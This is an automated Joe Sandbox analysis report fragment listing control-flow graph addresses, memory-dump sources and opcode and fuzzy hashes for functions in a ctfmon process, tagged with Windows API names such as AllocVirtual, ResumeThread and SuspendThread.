                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 9 7ffd9baea5fa-7ffd9bb14761 17 7ffd9bb14763 9->17 18 7ffd9bb14768-7ffd9bb147a1 9->18 17->18 19 7ffd9bb147a3 18->19 20 7ffd9bb147a8-7ffd9bb147fb 18->20 19->20 22 7ffd9bb147fd 20->22 23 7ffd9bb14802-7ffd9bb1484b call 7ffd9baea6f8 20->23 22->23 26 7ffd9bb1484d 23->26 27 7ffd9bb14852-7ffd9bb148ab 23->27 26->27 29 7ffd9bb148ad 27->29 30 7ffd9bb148b2-7ffd9bb1491b call 7ffd9bb0f8b0 27->30 29->30 34 7ffd9bb1491d 30->34 35 7ffd9bb14922-7ffd9bb1497b 30->35 34->35 38 7ffd9bb1497d 35->38 39 7ffd9bb14982-7ffd9bb149e7 call 7ffd9bb0f8b0 35->39 38->39 44 7ffd9bb149ee-7ffd9bb14a56 39->44 45 7ffd9bb149e9 39->45 50 7ffd9bb14a5d-7ffd9bb14a79 44->50 51 7ffd9bb14a58 44->51 45->44 52 7ffd9bb14a7f-7ffd9bb14acb 50->52 51->50 53 7ffd9bb14acd 52->53 54 7ffd9bb14ad2-7ffd9bb14b27 52->54 53->54 57 7ffd9bb14b2e-7ffd9bb14b93 54->57 58 7ffd9bb14b29 54->58 63 7ffd9bb14b95 57->63 64 7ffd9bb14b9a-7ffd9bb14bf7 57->64 58->57 63->64 67 7ffd9bb14bfe-7ffd9bb14c67 64->67 68 7ffd9bb14bf9 64->68 74 7ffd9bb14c6e-7ffd9bb14ce7 67->74 75 7ffd9bb14c69 67->75 68->67 77 7ffd9bb14cee-7ffd9bb14cfb 74->77 78 7ffd9bb14ce9 74->78 75->74 80 7ffd9bb14cfe-7ffd9bb14d02 77->80 78->77 81 7ffd9bb14d1f-7ffd9bb151b5 call 7ffd9baee2d0 call 7ffd9bb08660 call 7ffd9baee2d0 call 7ffd9bb08660 call 7ffd9baee2d0 call 7ffd9bb08660 80->81 82 7ffd9bb14d04-7ffd9bb14d1d 80->82 102 7ffd9bb1532a-7ffd9bb15394 call 7ffd9baee2d0 call 7ffd9bb08660 81->102 103 7ffd9bb151bb-7ffd9bb151c5 call 7ffd9bb0c640 81->103 82->81 110 7ffd9bb1555a-7ffd9bb15636 call 7ffd9bb0fec0 102->110 111 7ffd9bb1539a-7ffd9bb153a1 102->111 103->102 111->80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 10eeffe60740594637b2ca0789008db9c05e56962bbea82ddaea2f991306f72d
                                                    • Instruction ID: a496be9588e0dea7bb0fdd3adc174b68dd360b7d964e5a2614d751a74810fb5a
                                                    • Opcode Fuzzy Hash: 10eeffe60740594637b2ca0789008db9c05e56962bbea82ddaea2f991306f72d
                                                    • Instruction Fuzzy Hash: E332D03191D78D8FDB55EF68C868AEA7BB0FF16314F0541EBD448C71A2DA34A588CB41

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 52f5d9abe530d935a73c4c5b0bc5fde64946b8a3fc778b0404453550c4dd3267
                                                    • Instruction ID: cb950ef8fb99a685549ec3f45515d07c6d6ec5de59958621d35beb87b294566b
                                                    • Opcode Fuzzy Hash: 52f5d9abe530d935a73c4c5b0bc5fde64946b8a3fc778b0404453550c4dd3267
                                                    • Instruction Fuzzy Hash: 7002903091978D8FDB95EF68C869AE97BF0FF16304F0541EAD448C71A2DA34AA94CB41

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bad0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 19b5b32f5b7d70ce3bf05a1f4f239260ee89ff6eaad26842024c487d9155eac6
                                                    • Instruction ID: a80920d5948eb8a48150ddcfde82308a4bbd5d30afd10c9d68e5a285ab1460dc
                                                    • Opcode Fuzzy Hash: 19b5b32f5b7d70ce3bf05a1f4f239260ee89ff6eaad26842024c487d9155eac6
                                                    • Instruction Fuzzy Hash: 4EF19E3090964D8FDB95EFA8C855AEDBBF0FF59300F0141AAE408D32A6DB74A995CB41

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: bfa32f547bc29c70724d7361343cc261e4cd8e7a4aa5820f790d1aa20ec5ef44
                                                    • Instruction ID: c150b7c40dbb2b2f5ad99314bedad266d64782b855a8d72f6dff1ae663264bfa
                                                    • Opcode Fuzzy Hash: bfa32f547bc29c70724d7361343cc261e4cd8e7a4aa5820f790d1aa20ec5ef44
                                                    • Instruction Fuzzy Hash: 50518A70D0978C8FDB95DFA8C854AEDBBF0EF1A310F0441AAD049DB292DA749886CB11

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: bf113f23392f2735003b4d75db0e95d4d51ce05e3d27c9d03bdd708663f530bd
                                                    • Instruction ID: e120392d046b5e8aeb840ca84bf88cc85237133ac7b2c8df8352eda152055428
                                                    • Opcode Fuzzy Hash: bf113f23392f2735003b4d75db0e95d4d51ce05e3d27c9d03bdd708663f530bd
                                                    • Instruction Fuzzy Hash: 02416B70E0864C8FDB98DFA8D894BEDBBB0FF5A310F10416AD049E7292DA70A845CB41

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: c9e1836bc3aa8c54d4b1e40ab7012d56441323496c157eeaa19011504c77e6b4
                                                    • Instruction ID: 07da5c6bbb51b85efb83ecb83042c2a32170774616418eb2490b7e9d4c4503b3
                                                    • Opcode Fuzzy Hash: c9e1836bc3aa8c54d4b1e40ab7012d56441323496c157eeaa19011504c77e6b4
                                                    • Instruction Fuzzy Hash: C9410A70E0865C8FDB98DFA8D895BEDBBF0FB59311F10416AD009E7251DA719845CF41

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: a3347b8efc659e782cd7d2870dac0f86ec1a5c75185db64a2d66be65a15f88ce
                                                    • Instruction ID: 26b01fb32874a198e1d6fce4665ba2a18b78e9cf2bc06579d2acf8778c475da9
                                                    • Opcode Fuzzy Hash: a3347b8efc659e782cd7d2870dac0f86ec1a5c75185db64a2d66be65a15f88ce
                                                    • Instruction Fuzzy Hash: C4B1933091968D8FDB55EF68C869AED7BF0FF59304F0541ABD408C71A2DB34A694CB41

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N^H
                                                    • API String ID: 0-4206628934
                                                    • Opcode ID: b1de354ef30b979bdee58b1051e79c47f6b8a137f654dc6e76555f5bb6b42716
                                                    • Instruction ID: 98f379fd8f37f9cd3fa04584141642bedf20f21b908f185b9616aebdb12079f2
                                                    • Opcode Fuzzy Hash: b1de354ef30b979bdee58b1051e79c47f6b8a137f654dc6e76555f5bb6b42716
                                                    • Instruction Fuzzy Hash: 0391E432F0DA4A8FEB95EB6888646B87BF1EF45340F4502FAD04DD71E2DE28A845C751

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: b2e9ec359548f314259a9e6291fd5aa051bb041cb0c56f7320acba2e8e6f6fe7
                                                    • Instruction ID: 86ec97baf6985edcb23123f0b91e38bd464a7bc8f4b27132d1aa9cc2b780ddd4
                                                    • Opcode Fuzzy Hash: b2e9ec359548f314259a9e6291fd5aa051bb041cb0c56f7320acba2e8e6f6fe7
                                                    • Instruction Fuzzy Hash: A5A1CE3090E78D8FEB65EF6488696F97BB0FF16304F0541BAD448C71E6DA38A658CB41

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [^H
                                                    • API String ID: 0-2846327662
                                                    • Opcode ID: 452d205d98186245f4cadc02aa84f53d539755e7a59766efc619deeb90970a77
                                                    • Instruction ID: 1233559938b448782d7fdd3d969801f431ab6a474adf45cd35945e0568fdb09b
                                                    • Opcode Fuzzy Hash: 452d205d98186245f4cadc02aa84f53d539755e7a59766efc619deeb90970a77
                                                    • Instruction Fuzzy Hash: 6A711632E0C44B4FE778DA5C88769B877E0EF44350F140BB9D09ED75A2FE18A8668785

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 1dadc650124e02decec8f266715c86ac1c9341f21a16b5635fdbaa4a5b3dd3ec
                                                    • Instruction ID: b36133bb0cabe6446ff96a0646845431a3d99e268c8bea007edd09cecc3e8e55
                                                    • Opcode Fuzzy Hash: 1dadc650124e02decec8f266715c86ac1c9341f21a16b5635fdbaa4a5b3dd3ec
                                                    • Instruction Fuzzy Hash: DC517C72E0860E8FEB69DB98C4645BCB7B1FF48350F5042BED01AF7292DA396945CB14

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 885c80e8470e337617d7cb7babdc55267d804c9228fcaaa2f823126fba11a092
                                                    • Instruction ID: 4dec528e212f809886ae66d061b2568ec609f3471068efbbc3ae97e3df3b87ae
                                                    • Opcode Fuzzy Hash: 885c80e8470e337617d7cb7babdc55267d804c9228fcaaa2f823126fba11a092
                                                    • Instruction Fuzzy Hash: 3D514C32E0854F9FDB68DB98C4605BDB7B1FF48340F1042BAD01AF7296DA396A41CB45

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 50f1a2cba34e6fb89efee8dd3830b5b1b364d1c32bf4b604b8c01f67c162b6b1
                                                    • Instruction ID: 4926c7fad1ccbf7ec3a957374ba1a39295ee8224e4befc959114c243b259ae86
                                                    • Opcode Fuzzy Hash: 50f1a2cba34e6fb89efee8dd3830b5b1b364d1c32bf4b604b8c01f67c162b6b1
                                                    • Instruction Fuzzy Hash: AD417C30D0864C8FDB59DFA8D895BEDBBF0FF5A311F1041AAD049E7292DA34A885CB01

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 2ac82a409dbdabeeb3c29c3c7e7a0806d7524e38e8a75108936daf4db84ec6cf
                                                    • Instruction ID: 9153941e8ef5f6381c8f20447de4af147438d97c66535aed9e07a01c84ba6f98
                                                    • Opcode Fuzzy Hash: 2ac82a409dbdabeeb3c29c3c7e7a0806d7524e38e8a75108936daf4db84ec6cf
                                                    • Instruction Fuzzy Hash: E441B030A0860E8FDB64EF58C850AFE77B0FF58315F1041BAE459C72D2CA34AA54CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 90803508ec956b07d3ba9389235228c05b2e096df3a40f63f76b1003c2a835a7
                                                    • Instruction ID: f5e864fd43503e6764b5613bff31be072283de75092d045c62fc815daf82ba16
                                                    • Opcode Fuzzy Hash: 90803508ec956b07d3ba9389235228c05b2e096df3a40f63f76b1003c2a835a7
                                                    • Instruction Fuzzy Hash: A531F431A0860E8FDB54EF68D8146EA77F0FF58319F1041B7E419CB2D6CA34A944CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 86f7d4effada31f3c720e0daa418c24ebac0248678c139c6177e463800947dc4
                                                    • Instruction ID: 59f82e90347c26ab1004c8d540301b2537fdcceaf80cb726485a4fd0525a339e
                                                    • Opcode Fuzzy Hash: 86f7d4effada31f3c720e0daa418c24ebac0248678c139c6177e463800947dc4
                                                    • Instruction Fuzzy Hash: CD31DF35A0864E8FDB54DF18C814AEA7BF0FF84314F0040BAE418C72E5CB34AA59CBA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 687288ca4169bd4e36e78c5705146344da8ff6c515314fc57789abf454a38d60
                                                    • Instruction ID: 95c570017a65debba80a4ee7bc89fc266dbc595285021e0364b66adea81a393a
                                                    • Opcode Fuzzy Hash: 687288ca4169bd4e36e78c5705146344da8ff6c515314fc57789abf454a38d60
                                                    • Instruction Fuzzy Hash: 54019E30919B8D8FDB51EFA488187FA7BF0FF05304F4145BAE448C20A2DB38A658CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 219036b51f89b54dffc74f2641ff14cab2bea88f1c9b611bd548ed81c5fade63
                                                    • Instruction ID: f1f561831954778e01f1759f37cb3ace7c827b0aa4bcea915eb7316cdf2773f4
                                                    • Opcode Fuzzy Hash: 219036b51f89b54dffc74f2641ff14cab2bea88f1c9b611bd548ed81c5fade63
                                                    • Instruction Fuzzy Hash: B7925B75E095198FE725DB68C5C8B9973E2FF59300F1189F1D118D73AACA34EE80CA61
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e088f0834aa5af149a911eccb5bc69b4c851370c0d77d0fd62ebc89b182104ef
                                                    • Instruction ID: 4da946096fcdac2f6f6cde73c1a41097e6ebc06e5228ec2e505570eae41f747a
                                                    • Opcode Fuzzy Hash: e088f0834aa5af149a911eccb5bc69b4c851370c0d77d0fd62ebc89b182104ef
                                                    • Instruction Fuzzy Hash: E412903090968D8FCB95EF68C8696ED7FF0FF19300F0541AAE848C71A2DB78A955CB41
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 595768898bbb3561b2dbfe37f59c1cd7e1442e71e41f182fdff30dfb382b4a03
                                                    • Instruction ID: c1523cdc2564f7f28bf9de9647a9c485c8297b74fbb3c90f12cbd6916608b24c
                                                    • Opcode Fuzzy Hash: 595768898bbb3561b2dbfe37f59c1cd7e1442e71e41f182fdff30dfb382b4a03
                                                    • Instruction Fuzzy Hash: 37025F71E19A5D8FDBA8EF58C8A5BB8B7A1FF58304F0441BAD01DD72D2DA346980CB41
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ff25d2e0642bb240be5b894498439695ad4ea74b839af4714c6ab4f565df075
                                                    • Instruction ID: 514e528c8bcfdc79e060de07e474cdc783d51a35857ebe3fc00a7115891bf1f2
                                                    • Opcode Fuzzy Hash: 2ff25d2e0642bb240be5b894498439695ad4ea74b839af4714c6ab4f565df075
                                                    • Instruction Fuzzy Hash: E902D531A196468FEB69CF18C4E06B437B0FF49310F9446BDC44ADB68BDA38E881CB45
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3798acbc7f86683c19e77a10cceccec5b7b5c985ac8fdc30441dc7e8779e7a8
                                                    • Instruction ID: 7c37dd118e811f20c49edc39ca3c3d5b9ad9a0eb34c33df8960d7b0aa34f83a7
                                                    • Opcode Fuzzy Hash: a3798acbc7f86683c19e77a10cceccec5b7b5c985ac8fdc30441dc7e8779e7a8
                                                    • Instruction Fuzzy Hash: B4F1BF3091968D8FDB55EF68C8A96ED7BF0FF59304F0141ABD848C71A2DB34AA54CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8de6d10ecdb997d796e0e7ce4c9420b8026c0802997e7f985af223fa15871a9
                                                    • Instruction ID: f894ac4cc4f82316987dfff24b75af7d5349a6df8fd0e0cd02ca7c4156846eb0
                                                    • Opcode Fuzzy Hash: f8de6d10ecdb997d796e0e7ce4c9420b8026c0802997e7f985af223fa15871a9
                                                    • Instruction Fuzzy Hash: D6E10032E0DB478FE378CB68D4A017577F1FF54340B1046BED48AD7682EA29B8428769
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0af58843370a0c6553b454f7ec68bb049f794951fe7f5b63b00c3d0003566a9
                                                    • Instruction ID: 04b993b10a068fcaecbd786a2c5b0c321d1b8f2fadbd726fc853c9f8858eee29
                                                    • Opcode Fuzzy Hash: d0af58843370a0c6553b454f7ec68bb049f794951fe7f5b63b00c3d0003566a9
                                                    • Instruction Fuzzy Hash: 69510932E0D79B8FD7659BA898704E87FB0EF55354B4802BBD089DB0E3ED286846C745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0e5aacd460ed968cbade611ff7d685fdca2cffac6e68d18f7213d45ee1c95de
                                                    • Instruction ID: 992de046fc5b7b16f345f5f46a4c1e9a2f7d66134b5a31a6cf663f919890cd89
                                                    • Opcode Fuzzy Hash: b0e5aacd460ed968cbade611ff7d685fdca2cffac6e68d18f7213d45ee1c95de
                                                    • Instruction Fuzzy Hash: 18C1A332E0C91A8FEBB8DB48C8B5A6473F1FF55351F5006B9D01ED7292EE24AC458B85
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f383a2d58f40e07dc197bbcaa2a090224059baf511ac34307d5aba296302798
                                                    • Instruction ID: 9c1012e75a2ba0f3f4dae69e8c96c1aca64049164e608c0a83ad5477e40423cf
                                                    • Opcode Fuzzy Hash: 0f383a2d58f40e07dc197bbcaa2a090224059baf511ac34307d5aba296302798
                                                    • Instruction Fuzzy Hash: D251B732E0C92BDAD378BF98A4715F97760EF54399F1407B6E00EDA1C6DE29684086C8
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfa55ae29d478d331588a649e9a21e032646bbdee51f8542d32d05fb6a8f7ecf
                                                    • Instruction ID: 00d59d4390a9f9f2aeeb3786ee0ddb3d69bda364b4ab15e21a30a572d553b0f0
                                                    • Opcode Fuzzy Hash: bfa55ae29d478d331588a649e9a21e032646bbdee51f8542d32d05fb6a8f7ecf
                                                    • Instruction Fuzzy Hash: 04E1C131A18A478FEB59CF58C4E05B137B1FF45354B5442BDD84A8B68BDA38F981CB88
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 050229357221a5951e1c8b3252d46986046a9faac65cf9624bc8b98c41d4230f
                                                    • Instruction ID: 167771db829df015eb2d030858d03ed487e117f895a3c5246fe949cf995a7198
                                                    • Opcode Fuzzy Hash: 050229357221a5951e1c8b3252d46986046a9faac65cf9624bc8b98c41d4230f
                                                    • Instruction Fuzzy Hash: 77C1B331B18A1E8FDB58DF58C8A59B9B3F2FF58314B1041A9D04EDB296DA35EC42CB44
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8346f83f7a50ed4c991ca44508ae8f370aabbe4e88baf2fe4187e6b5645feecb
                                                    • Instruction ID: 5ca2b3b41e8465803a6af2ea06d57703de45a7508438263a9c306616301c6176
                                                    • Opcode Fuzzy Hash: 8346f83f7a50ed4c991ca44508ae8f370aabbe4e88baf2fe4187e6b5645feecb
                                                    • Instruction Fuzzy Hash: 99C1C231A18A478BEB1DCF58C4E05B137B1FF45344B5446BDD88A8B68BEA38F581CB49
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f454c108e78a5230e35dd6e2778c486709d74c10bde4f616c254b4f9c39af5f4
                                                    • Instruction ID: f3e8e16741a3beb315be26cd2c1ae665908986bc1d910133fe7e2c1c587facbf
                                                    • Opcode Fuzzy Hash: f454c108e78a5230e35dd6e2778c486709d74c10bde4f616c254b4f9c39af5f4
                                                    • Instruction Fuzzy Hash: 3631E833F0C96BCEE779DB9858314F87BB0AF55394F140A7AD00DE61C2DD2968008789
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
